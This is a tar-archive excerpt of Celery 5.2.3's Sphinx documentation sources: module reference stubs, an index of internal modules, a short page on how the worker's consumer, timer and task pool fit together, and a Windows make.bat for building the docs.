celery-5.2.3/docs/internals/reference/celery.concurrency.prefork.rst0000664000175000017500000000046300000000000025602 0ustar00asifasif00000000000000============================================================= ``celery.concurrency.prefork`` ============================================================= .. contents:: :local: .. currentmodule:: celery.concurrency.prefork .. automodule:: celery.concurrency.prefork :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.concurrency.rst0000664000175000017500000000034500000000000024132 0ustar00asifasif00000000000000================================== ``celery.concurrency`` ================================== .. contents:: :local: .. 
currentmodule:: celery.concurrency .. automodule:: celery.concurrency :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.concurrency.solo.rst0000664000175000017500000000046600000000000025111 0ustar00asifasif00000000000000=================================================================== ``celery.concurrency.solo`` =================================================================== .. contents:: :local: .. currentmodule:: celery.concurrency.solo .. automodule:: celery.concurrency.solo :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.concurrency.thread.rst0000664000175000017500000000046000000000000025376 0ustar00asifasif00000000000000============================================================= ``celery.concurrency.thread`` ============================================================= .. contents:: :local: .. currentmodule:: celery.concurrency.thread .. automodule:: celery.concurrency.thread :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.events.cursesmon.rst0000664000175000017500000000040400000000000025115 0ustar00asifasif00000000000000========================================== ``celery.events.cursesmon`` ========================================== .. contents:: :local: .. currentmodule:: celery.events.cursesmon .. automodule:: celery.events.cursesmon :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.events.dumper.rst0000664000175000017500000000037300000000000024400 0ustar00asifasif00000000000000========================================== ``celery.events.dumper`` ========================================== .. contents:: :local: .. currentmodule:: celery.events.dumper .. automodule:: celery.events.dumper :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.events.snapshot.rst0000664000175000017500000000040100000000000024733 0ustar00asifasif00000000000000========================================== ``celery.events.snapshot`` ========================================== .. contents:: :local: .. currentmodule:: celery.events.snapshot .. automodule:: celery.events.snapshot :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.platforms.rst0000664000175000017500000000034700000000000023611 0ustar00asifasif00000000000000====================================== ``celery.platforms`` ====================================== .. contents:: :local: .. currentmodule:: celery.platforms .. automodule:: celery.platforms :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.security.certificate.rst0000664000175000017500000000042000000000000025722 0ustar00asifasif00000000000000========================================== ``celery.security.certificate`` ========================================== .. contents:: :local: .. 
currentmodule:: celery.security.certificate .. automodule:: celery.security.certificate :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.security.key.rst0000664000175000017500000000037000000000000024234 0ustar00asifasif00000000000000========================================== ``celery.security.key`` ========================================== .. contents:: :local: .. currentmodule:: celery.security.key .. automodule:: celery.security.key :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.security.serialization.rst0000664000175000017500000000042600000000000026323 0ustar00asifasif00000000000000========================================== ``celery.security.serialization`` ========================================== .. contents:: :local: .. currentmodule:: celery.security.serialization .. automodule:: celery.security.serialization :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.security.utils.rst0000664000175000017500000000037600000000000024612 0ustar00asifasif00000000000000========================================== ``celery.security.utils`` ========================================== .. contents:: :local: .. currentmodule:: celery.security.utils .. automodule:: celery.security.utils :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.abstract.rst0000664000175000017500000000040000000000000024532 0ustar00asifasif00000000000000=========================================== ``celery.utils.abstract`` =========================================== .. contents:: :local: .. currentmodule:: celery.utils.abstract .. automodule:: celery.utils.abstract :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.collections.rst0000664000175000017500000000037400000000000025257 0ustar00asifasif00000000000000==================================== ``celery.utils.collections`` ==================================== .. currentmodule:: celery.utils.collections .. contents:: :local: .. automodule:: celery.utils.collections :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.deprecated.rst0000664000175000017500000000040400000000000025033 0ustar00asifasif00000000000000========================================== ``celery.utils.deprecated`` ========================================== .. contents:: :local: .. currentmodule:: celery.utils.deprecated .. automodule:: celery.utils.deprecated :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.dispatch.rst0000664000175000017500000000037400000000000024540 0ustar00asifasif00000000000000========================================= ``celery.utils.dispatch`` ========================================= .. contents:: :local: .. currentmodule:: celery.utils.dispatch .. 
automodule:: celery.utils.dispatch :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.dispatch.signal.rst0000664000175000017500000000044700000000000026015 0ustar00asifasif00000000000000==================================================== ``celery.utils.dispatch.signal`` ==================================================== .. contents:: :local: .. currentmodule:: celery.utils.dispatch.signal .. automodule:: celery.utils.dispatch.signal :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.functional.rst0000664000175000017500000000043200000000000025076 0ustar00asifasif00000000000000===================================================== ``celery.utils.functional`` ===================================================== .. contents:: :local: .. currentmodule:: celery.utils.functional .. automodule:: celery.utils.functional :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.graph.rst0000664000175000017500000000036500000000000024042 0ustar00asifasif00000000000000========================================== ``celery.utils.graph`` ========================================== .. contents:: :local: .. currentmodule:: celery.utils.graph .. automodule:: celery.utils.graph :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.imports.rst0000664000175000017500000000042100000000000024427 0ustar00asifasif00000000000000===================================================== ``celery.utils.imports`` ===================================================== .. contents:: :local: .. currentmodule:: celery.utils.imports .. automodule:: celery.utils.imports :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.iso8601.rst0000664000175000017500000000041300000000000024044 0ustar00asifasif00000000000000================================================== ``celery.utils.iso8601`` ================================================== .. contents:: :local: .. currentmodule:: celery.utils.iso8601 .. automodule:: celery.utils.iso8601 :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.log.rst0000664000175000017500000000040500000000000023515 0ustar00asifasif00000000000000===================================================== ``celery.utils.log`` ===================================================== .. contents:: :local: .. currentmodule:: celery.utils.log .. automodule:: celery.utils.log :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.nodenames.rst0000664000175000017500000000040100000000000024701 0ustar00asifasif00000000000000========================================== ``celery.utils.nodenames`` ========================================== .. contents:: :local: .. currentmodule:: celery.utils.nodenames .. 
automodule:: celery.utils.nodenames :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.objects.rst0000664000175000017500000000041300000000000024364 0ustar00asifasif00000000000000================================================== ``celery.utils.objects`` ================================================== .. contents:: :local: .. currentmodule:: celery.utils.objects .. automodule:: celery.utils.objects :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.rst0000664000175000017500000000030300000000000022732 0ustar00asifasif00000000000000========================== ``celery.utils`` ========================== .. contents:: :local: .. currentmodule:: celery.utils .. automodule:: celery.utils :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.saferepr.rst0000664000175000017500000000040000000000000024536 0ustar00asifasif00000000000000=========================================== ``celery.utils.saferepr`` =========================================== .. contents:: :local: .. currentmodule:: celery.utils.saferepr .. automodule:: celery.utils.saferepr :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.serialization.rst0000664000175000017500000000042100000000000025607 0ustar00asifasif00000000000000============================================ ``celery.utils.serialization`` ============================================ .. contents:: :local: .. currentmodule:: celery.utils.serialization .. automodule:: celery.utils.serialization :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.sysinfo.rst0000664000175000017500000000041300000000000024425 0ustar00asifasif00000000000000================================================== ``celery.utils.sysinfo`` ================================================== .. contents:: :local: .. currentmodule:: celery.utils.sysinfo .. automodule:: celery.utils.sysinfo :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.term.rst0000664000175000017500000000041000000000000023677 0ustar00asifasif00000000000000===================================================== ``celery.utils.term`` ===================================================== .. contents:: :local: .. currentmodule:: celery.utils.term .. automodule:: celery.utils.term :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.text.rst0000664000175000017500000000041000000000000023714 0ustar00asifasif00000000000000===================================================== ``celery.utils.text`` ===================================================== .. contents:: :local: .. currentmodule:: celery.utils.text .. 
automodule:: celery.utils.text :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.threads.rst0000664000175000017500000000037300000000000024372 0ustar00asifasif00000000000000========================================== ``celery.utils.threads`` ========================================== .. contents:: :local: .. currentmodule:: celery.utils.threads .. automodule:: celery.utils.threads :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.time.rst0000664000175000017500000000040200000000000023667 0ustar00asifasif00000000000000================================================== ``celery.utils.time`` ================================================== .. contents:: :local: .. currentmodule:: celery.utils.time .. automodule:: celery.utils.time :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.utils.timer2.rst0000664000175000017500000000034000000000000024134 0ustar00asifasif00000000000000============================== ``celery.utils.timer2`` ============================== .. contents:: :local: .. currentmodule:: celery.utils.timer2 .. automodule:: celery.utils.timer2 :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.worker.autoscale.rst0000664000175000017500000000040000000000000025060 0ustar00asifasif00000000000000======================================== ``celery.worker.autoscale`` ======================================== .. contents:: :local: .. currentmodule:: celery.worker.autoscale .. automodule:: celery.worker.autoscale :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.worker.components.rst0000664000175000017500000000040300000000000025270 0ustar00asifasif00000000000000======================================== ``celery.worker.components`` ======================================== .. contents:: :local: .. currentmodule:: celery.worker.components .. automodule:: celery.worker.components :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.worker.control.rst0000664000175000017500000000040400000000000024564 0ustar00asifasif00000000000000============================================= ``celery.worker.control`` ============================================= .. contents:: :local: .. currentmodule:: celery.worker.control .. automodule:: celery.worker.control :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.worker.heartbeat.rst0000664000175000017500000000041200000000000025042 0ustar00asifasif00000000000000============================================= ``celery.worker.heartbeat`` ============================================= .. contents:: :local: .. currentmodule:: celery.worker.heartbeat .. 
automodule:: celery.worker.heartbeat :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.worker.loops.rst0000664000175000017500000000035400000000000024244 0ustar00asifasif00000000000000==================================== ``celery.worker.loops`` ==================================== .. contents:: :local: .. currentmodule:: celery.worker.loops .. automodule:: celery.worker.loops :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/celery.worker.pidbox.rst0000664000175000017500000000035700000000000024400 0ustar00asifasif00000000000000==================================== ``celery.worker.pidbox`` ==================================== .. contents:: :local: .. currentmodule:: celery.worker.pidbox .. automodule:: celery.worker.pidbox :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/reference/index.rst0000664000175000017500000000365000000000000021427 0ustar00asifasif00000000000000=========================== Internal Module Reference =========================== :Release: |version| :Date: |today| .. toctree:: :maxdepth: 1 celery.worker.components celery.worker.loops celery.worker.heartbeat celery.worker.control celery.worker.pidbox celery.worker.autoscale celery.concurrency celery.concurrency.solo celery.concurrency.prefork celery.concurrency.eventlet celery.concurrency.gevent celery.concurrency.thread celery.concurrency.base celery.backends celery.backends.base celery.backends.asynchronous celery.backends.azureblockblob celery.backends.rpc celery.backends.database celery.backends.cache celery.backends.consul celery.backends.couchdb celery.backends.mongodb celery.backends.elasticsearch celery.backends.redis celery.backends.cassandra celery.backends.couchbase celery.backends.arangodb celery.backends.dynamodb celery.backends.filesystem celery.backends.cosmosdbsql celery.backends.s3 celery.app.trace celery.app.annotations celery.app.routes celery.security.certificate celery.security.key celery.security.serialization celery.security.utils celery.events.snapshot celery.events.cursesmon celery.events.dumper celery.backends.database.models celery.backends.database.session celery.utils celery.utils.abstract celery.utils.collections celery.utils.nodenames celery.utils.deprecated celery.utils.functional celery.utils.graph celery.utils.objects celery.utils.term celery.utils.time celery.utils.iso8601 celery.utils.saferepr celery.utils.serialization celery.utils.sysinfo celery.utils.threads celery.utils.timer2 celery.utils.imports celery.utils.log celery.utils.text celery.utils.dispatch celery.utils.dispatch.signal celery.platforms celery._state ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/internals/worker.rst0000664000175000017500000000265400000000000017676 0ustar00asifasif00000000000000.. _internals-worker: ======================= Internals: The worker ======================= .. contents:: :local: Introduction ============ The worker consists of 4 main components: the consumer, the scheduler, the mediator and the task pool. All these components runs in parallel working with two data structures: the ready queue and the ETA schedule. 
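Before looking at each data structure in detail, the following is a minimal, self-contained sketch of how a ready queue and a :mod:`heapq`-based ETA schedule can work together. It's purely illustrative (the names ``ready_queue``, ``eta_schedule``, ``task_received`` and ``move_due`` are made up for this example) and isn't Celery's actual implementation:

.. code-block:: python

    import heapq
    import itertools
    import time
    from collections import deque

    ready_queue = deque()          # tasks that may execute immediately
    eta_schedule = []              # heap of (eta, sequence, task) entries
    _sequence = itertools.count()  # tie-breaker so tasks never compare directly

    def task_received(task, eta=None):
        """Place an incoming task on the ready queue or the ETA schedule."""
        if eta is None:
            ready_queue.append(task)
        else:
            heapq.heappush(eta_schedule, (eta, next(_sequence), task))

    def move_due(now=None):
        """Move tasks whose ETA has passed over to the ready queue."""
        now = time.monotonic() if now is None else now
        while eta_schedule and eta_schedule[0][0] <= now:
            _eta, _seq, task = heapq.heappop(eta_schedule)
            ready_queue.append(task)

    task_received('add(2, 2)')                             # ready right away
    task_received('mul(4, 4)', eta=time.monotonic() + 30)  # held until due
    move_due()
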
Data structures =============== timer ----- The timer uses :mod:`heapq` to schedule internal functions. It's very efficient and can handle hundred of thousands of entries. Components ========== Consumer -------- Receives messages from the broker using :pypi:`Kombu`. When a message is received it's converted into a :class:`celery.worker.request.Request` object. Tasks with an ETA, or rate-limit are entered into the `timer`, messages that can be immediately processed are sent to the execution pool. ETA and rate-limit when used together will result in the rate limit being observed with the task being scheduled after the ETA. Timer ----- The timer schedules internal functions, like cleanup and internal monitoring, but also it schedules ETA tasks and rate limited tasks. If the scheduled tasks ETA has passed it is moved to the execution pool. TaskPool -------- This is a slightly modified :class:`multiprocessing.Pool`. It mostly works the same way, except it makes sure all of the workers are running at all times. If a worker is missing, it replaces it with a new one. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/make.bat0000664000175000017500000001677300000000000015250 0ustar00asifasif00000000000000@ECHO OFF REM Command file for Sphinx documentation if "%SPHINXBUILD%" == "" ( set SPHINXBUILD=sphinx-build ) set BUILDDIR=_build set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% . set I18NSPHINXOPTS=%SPHINXOPTS% . if NOT "%PAPER%" == "" ( set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS% set I18NSPHINXOPTS=-D latex_paper_size=%PAPER% %I18NSPHINXOPTS% ) if "%1" == "" goto help if "%1" == "help" ( :help echo.Please use `make ^` where ^ is one of echo. html to make standalone HTML files echo. livehtml to start a local server hosting the docs echo. dirhtml to make HTML files named index.html in directories echo. singlehtml to make a single large HTML file echo. pickle to make pickle files echo. json to make JSON files echo. htmlhelp to make HTML files and a HTML help project echo. qthelp to make HTML files and a qthelp project echo. devhelp to make HTML files and a Devhelp project echo. epub to make an epub echo. epub3 to make an epub3 echo. latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter echo. text to make text files echo. man to make manual pages echo. texinfo to make Texinfo files echo. gettext to make PO message catalogs echo. changes to make an overview over all changed/added/deprecated items echo. xml to make Docutils-native XML files echo. pseudoxml to make pseudoxml-XML files for display purposes echo. linkcheck to check all external links for integrity echo. doctest to run all doctests embedded in the documentation if enabled echo. coverage to run coverage check of the documentation if enabled goto end ) if "%1" == "clean" ( for /d %%i in (%BUILDDIR%\*) do rmdir /q /s %%i del /q /s %BUILDDIR%\* goto end ) REM Check if sphinx-build is available and fallback to Python version if any %SPHINXBUILD% 1>NUL 2>NUL if errorlevel 9009 goto sphinx_python goto sphinx_ok :sphinx_python set SPHINXBUILD=python -m sphinx.__init__ %SPHINXBUILD% 2> nul if errorlevel 9009 ( echo. echo.The 'sphinx-build' command was not found. Make sure you have Sphinx echo.installed, then set the SPHINXBUILD environment variable to point echo.to the full path of the 'sphinx-build' executable. Alternatively you echo.may add the Sphinx directory to PATH. echo. 
echo.If you don't have Sphinx installed, grab it from echo.http://sphinx-doc.org/ exit /b 1 ) :sphinx_ok if "%1" == "html" ( %SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html if errorlevel 1 exit /b 1 echo. echo.Build finished. The HTML pages are in %BUILDDIR%/html. goto end ) if "%1" == "dirhtml" ( %SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml if errorlevel 1 exit /b 1 echo. echo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml. goto end ) if "%1" == "singlehtml" ( %SPHINXBUILD% -b singlehtml %ALLSPHINXOPTS% %BUILDDIR%/singlehtml if errorlevel 1 exit /b 1 echo. echo.Build finished. The HTML pages are in %BUILDDIR%/singlehtml. goto end ) if "%1" == "pickle" ( %SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle if errorlevel 1 exit /b 1 echo. echo.Build finished; now you can process the pickle files. goto end ) if "%1" == "json" ( %SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json if errorlevel 1 exit /b 1 echo. echo.Build finished; now you can process the JSON files. goto end ) if "%1" == "htmlhelp" ( %SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp if errorlevel 1 exit /b 1 echo. echo.Build finished; now you can run HTML Help Workshop with the ^ .hhp project file in %BUILDDIR%/htmlhelp. goto end ) if "%1" == "qthelp" ( %SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp if errorlevel 1 exit /b 1 echo. echo.Build finished; now you can run "qcollectiongenerator" with the ^ .qhcp project file in %BUILDDIR%/qthelp, like this: echo.^> qcollectiongenerator %BUILDDIR%\qthelp\PROJ.qhcp echo.To view the help file: echo.^> assistant -collectionFile %BUILDDIR%\qthelp\PROJ.ghc goto end ) if "%1" == "devhelp" ( %SPHINXBUILD% -b devhelp %ALLSPHINXOPTS% %BUILDDIR%/devhelp if errorlevel 1 exit /b 1 echo. echo.Build finished. goto end ) if "%1" == "epub" ( %SPHINXBUILD% -b epub %ALLSPHINXOPTS% %BUILDDIR%/epub if errorlevel 1 exit /b 1 echo. echo.Build finished. The epub file is in %BUILDDIR%/epub. goto end ) if "%1" == "epub3" ( %SPHINXBUILD% -b epub3 %ALLSPHINXOPTS% %BUILDDIR%/epub3 if errorlevel 1 exit /b 1 echo. echo.Build finished. The epub3 file is in %BUILDDIR%/epub3. goto end ) if "%1" == "latex" ( %SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex if errorlevel 1 exit /b 1 echo. echo.Build finished; the LaTeX files are in %BUILDDIR%/latex. goto end ) if "%1" == "latexpdf" ( %SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex cd %BUILDDIR%/latex make all-pdf cd %~dp0 echo. echo.Build finished; the PDF files are in %BUILDDIR%/latex. goto end ) if "%1" == "latexpdfja" ( %SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex cd %BUILDDIR%/latex make all-pdf-ja cd %~dp0 echo. echo.Build finished; the PDF files are in %BUILDDIR%/latex. goto end ) if "%1" == "text" ( %SPHINXBUILD% -b text %ALLSPHINXOPTS% %BUILDDIR%/text if errorlevel 1 exit /b 1 echo. echo.Build finished. The text files are in %BUILDDIR%/text. goto end ) if "%1" == "man" ( %SPHINXBUILD% -b man %ALLSPHINXOPTS% %BUILDDIR%/man if errorlevel 1 exit /b 1 echo. echo.Build finished. The manual pages are in %BUILDDIR%/man. goto end ) if "%1" == "texinfo" ( %SPHINXBUILD% -b texinfo %ALLSPHINXOPTS% %BUILDDIR%/texinfo if errorlevel 1 exit /b 1 echo. echo.Build finished. The Texinfo files are in %BUILDDIR%/texinfo. goto end ) if "%1" == "gettext" ( %SPHINXBUILD% -b gettext %I18NSPHINXOPTS% %BUILDDIR%/locale if errorlevel 1 exit /b 1 echo. echo.Build finished. The message catalogs are in %BUILDDIR%/locale. 
goto end ) if "%1" == "changes" ( %SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes if errorlevel 1 exit /b 1 echo. echo.The overview file is in %BUILDDIR%/changes. goto end ) if "%1" == "linkcheck" ( %SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck if errorlevel 1 exit /b 1 echo. echo.Link check complete; look for any errors in the above output ^ or in %BUILDDIR%/linkcheck/output.txt. goto end ) if "%1" == "doctest" ( %SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest if errorlevel 1 exit /b 1 echo. echo.Testing of doctests in the sources finished, look at the ^ results in %BUILDDIR%/doctest/output.txt. goto end ) if "%1" == "coverage" ( %SPHINXBUILD% -b coverage %ALLSPHINXOPTS% %BUILDDIR%/coverage if errorlevel 1 exit /b 1 echo. echo.Testing of coverage in the sources finished, look at the ^ results in %BUILDDIR%/coverage/python.txt. goto end ) if "%1" == "xml" ( %SPHINXBUILD% -b xml %ALLSPHINXOPTS% %BUILDDIR%/xml if errorlevel 1 exit /b 1 echo. echo.Build finished. The XML files are in %BUILDDIR%/xml. goto end ) if "%1" == "pseudoxml" ( %SPHINXBUILD% -b pseudoxml %ALLSPHINXOPTS% %BUILDDIR%/pseudoxml if errorlevel 1 exit /b 1 echo. echo.Build finished. The pseudo-XML files are in %BUILDDIR%/pseudoxml. goto end ) if "%1" == "livehtml" ( sphinx-autobuild -b html --open-browser -p 7000 --watch %APP% -c . %SOURCEDIR% %BUILDDIR%/html goto end ) :end ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.6757545 celery-5.2.3/docs/reference/0000775000175000017500000000000000000000000015563 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.amqp.rst0000664000175000017500000000254300000000000021320 0ustar00asifasif00000000000000.. currentmodule:: celery.app.amqp .. automodule:: celery.app.amqp .. contents:: :local: AMQP ---- .. autoclass:: AMQP .. attribute:: Connection Broker connection class used. Default is :class:`kombu.Connection`. .. attribute:: Consumer Base Consumer class used. Default is :class:`kombu.Consumer`. .. attribute:: Producer Base Producer class used. Default is :class:`kombu.Producer`. .. attribute:: queues All currently defined task queues (a :class:`Queues` instance). .. attribute:: argsrepr_maxsize Max size of positional argument representation used for logging purposes. Default is 1024. .. attribute:: kwargsrepr_maxsize Max size of keyword argument representation used for logging purposes. Default is 1024. .. automethod:: Queues .. automethod:: Router .. automethod:: flush_routes .. autoattribute:: create_task_message .. autoattribute:: send_task_message .. autoattribute:: default_queue .. autoattribute:: default_exchange .. autoattribute:: producer_pool .. autoattribute:: router .. autoattribute:: routes Queues ------ .. autoclass:: Queues :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.autoretry.rst0000664000175000017500000000035500000000000022417 0ustar00asifasif00000000000000=================================== ``celery.app.autoretry`` =================================== .. contents:: :local: .. currentmodule:: celery.app.autoretry .. 
automodule:: celery.app.autoretry :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.backends.rst0000664000175000017500000000035200000000000022130 0ustar00asifasif00000000000000=================================== ``celery.app.backends`` =================================== .. contents:: :local: .. currentmodule:: celery.app.backends .. automodule:: celery.app.backends :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.builtins.rst0000664000175000017500000000041400000000000022206 0ustar00asifasif00000000000000==================================================== ``celery.app.builtins`` ==================================================== .. contents:: :local: .. currentmodule:: celery.app.builtins .. automodule:: celery.app.builtins :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.control.rst0000664000175000017500000000041100000000000022032 0ustar00asifasif00000000000000==================================================== ``celery.app.control`` ==================================================== .. contents:: :local: .. currentmodule:: celery.app.control .. automodule:: celery.app.control :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.defaults.rst0000664000175000017500000000044200000000000022165 0ustar00asifasif00000000000000=============================================================== ``celery.app.defaults`` =============================================================== .. contents:: :local: .. currentmodule:: celery.app.defaults .. automodule:: celery.app.defaults :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.events.rst0000664000175000017500000000033600000000000021664 0ustar00asifasif00000000000000================================ ``celery.app.events`` ================================ .. contents:: :local: .. currentmodule:: celery.app.events .. automodule:: celery.app.events :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.log.rst0000664000175000017500000000032500000000000021137 0ustar00asifasif00000000000000================================ ``celery.app.log`` ================================ .. contents:: :local: .. currentmodule:: celery.app.log .. automodule:: celery.app.log :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.registry.rst0000664000175000017500000000034400000000000022227 0ustar00asifasif00000000000000================================ ``celery.app.registry`` ================================ .. contents:: :local: .. currentmodule:: celery.app.registry .. 
